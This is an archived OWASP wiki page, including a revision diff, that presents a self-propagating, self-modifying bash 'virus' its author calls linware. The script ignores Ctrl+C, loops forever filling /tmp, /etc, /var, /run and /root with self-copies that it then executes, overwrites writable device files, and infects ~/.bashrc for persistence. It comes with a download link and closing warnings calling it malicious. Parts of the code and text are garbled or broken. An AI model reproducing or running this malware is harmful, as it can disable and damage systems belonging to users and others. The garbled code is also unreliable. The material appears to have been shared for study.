This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Metamorphic Virology"
| Line 93: | Line 93: | ||
Using cat now the tmp files are being written with a bidien payload. From FSS to FSS is one output file. | Using cat now the tmp files are being written with a bidien payload. From FSS to FSS is one output file. | ||
| − | #!/bin/bash | + | #!/bin/bash |
| − | trap '' INT | + | trap '' INT |
| − | for (( ; ; )) | + | for (( ; ; )) |
| − | do | + | do |
| − | + | FILE="/tmp/linware.3861." | |
| − | + | echo /tmp/linware.21415. | |
| − | + | > /tmp/linware.21415. | |
| − | + | FILES="/var/linware.19561." | |
| − | + | echo /var/linware.10574. | |
| − | + | > /var/linware.10574. | |
| − | + | FILEZ="/etc/linware.1020." | |
| − | + | echo /etc/linware.16689. | |
| − | + | > /etc/linware.16689. | |
| − | + | FILE="/tmp/linware.21532." | |
| − | + | echo /tmp/linware.21415. | |
| − | + | > /tmp/linware.21415. | |
| − | + | FILES="/var/linware.8989." | |
| − | + | echo /var/linware.10574. | |
| − | + | > /var/linware.10574. | |
| − | + | FILEZ="/etc/linware.27934." | |
| − | + | echo /etc/linware.16689. | |
| − | + | > /etc/linware.16689. | |
| − | + | FILER="/run/linware.1029." | |
| − | + | echo /run/linware.2459. | |
| − | + | > /run/linware.2459. | |
| − | + | FILEQ="/root/linware.29530." | |
| − | + | echo /root/linware.21523. | |
| − | + | > /root/linware.21523. | |
| − | + | exec ~/linware.18402. | |
| − | + | ssh lt 2>/tmp/linware.14894. | |
cat /tmp/linware.24609.|awk -F"`" {'print 12002'}|awk -F"\'" {'print 12646'} | cat /tmp/linware.24609.|awk -F"`" {'print 12002'}|awk -F"\'" {'print 12646'} | ||
while /bin/true ; do | while /bin/true ; do | ||
Revision as of 23:13, 6 March 2013
Rudimentary Metamorphic Virology
By Gregory Disney-Leugers
Download at: https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing
Virology should be viewed as evolutionary biology being used in code, to demonstrate this I wrote a bash script. This code is metamorphic in the since of self modifying and self propagating; This script covers the three main attributes of metamorphic virology methods of survival, reproduction, and exploitation.
Surivival:
#!/bin/bash trap INT for (( ; ; )) do
The first line "trap INT" creates a lock on the process meaning once its activated, ctrl+c can't stop the process. Generally speaking with a loop such as the second and third line a pid be created to ensure that it cloud be stopped. In this script no pid is created to ensure survival.
Reproduction:
#!/bin/bash export RESOLV_HOST_CONF=/etc/shadow trap INT for (( ; ; )) do FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILER="/run/$(basename $0).$RANDOM." echo $FILER > $FILER FILEQ="/root/$(basename $0).$RANDOM." echo $FILEQ > $FILEQ
The script now has a loop with producing blank files, Roughly 7 a kernel second. The way the file is written it uses the basemame with a random output.
cd /root && chmod u+x /root/$(basename $0).$RANDOM. && cat >~/$(basename $0).$RANDOM. <<FSS #!/bin/bash trap INT for (( ; ; )) do FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILER="/run/$(basename $0).$RANDOM." echo $FILER > $FILER FILEQ="/root/$(basename $0).$RANDOM." echo $FILEQ > $FILEQ
Using cat now the files are being written with the original loop reproduction script into the generated files.
ssh lt 2>/tmp/$(basename $0).$RANDOM.
cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print $RANDOM'}|awk -F"\'" {'print $RANDOM'}
while /bin/true ; do
for i in $(basename $0)/* ; do
if [ -w $i -a -c $i -a $i != $RANDOM ]; then
cat $RANDOM > $i
fi
done
done
exec ~/$(basename $0).$RANDOM.
FSS
Using cat now the tmp files are being written with a bidien payload. From FSS to FSS is one output file.
#!/bin/bash
trap INT
for (( ; ; ))
do
FILE="/tmp/linware.3861."
echo /tmp/linware.21415.
> /tmp/linware.21415.
FILES="/var/linware.19561."
echo /var/linware.10574.
> /var/linware.10574.
FILEZ="/etc/linware.1020."
echo /etc/linware.16689.
> /etc/linware.16689.
FILE="/tmp/linware.21532."
echo /tmp/linware.21415.
> /tmp/linware.21415.
FILES="/var/linware.8989."
echo /var/linware.10574.
> /var/linware.10574.
FILEZ="/etc/linware.27934."
echo /etc/linware.16689.
> /etc/linware.16689.
FILER="/run/linware.1029."
echo /run/linware.2459.
> /run/linware.2459.
FILEQ="/root/linware.29530."
echo /root/linware.21523.
> /root/linware.21523.
exec ~/linware.18402.
ssh lt 2>/tmp/linware.14894.
cat /tmp/linware.24609.|awk -F"`" {'print 12002'}|awk -F"\'" {'print 12646'}
while /bin/true ; do
for i in linware/* ; do
if [ -w -a -c -a != 13866 ]; then
cat 1915 >
fi
done
done
exec ~/linware.14617.
Here's a sample script of the output of the output script, at end of the script it executes another output script. This can be used to map the propagation of the malware.
Exploitation:
cat >~/.bashrc <<ASS /opt/linware /bin/linware /etc/linware /run/linware ASS cp /opt/linware /bin cp /opt/linware /etc exec /opt/linware exec ~/$(basename $0).$RANDOM
Using cat once again the script writes to the bashrc, to infect bash to ensure survival. At end of the loop script it initiates the script all over again.
https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing
WARNING: this script only be used in a controlled environment such as a VM.
WARNING: This script should be consider malicious.
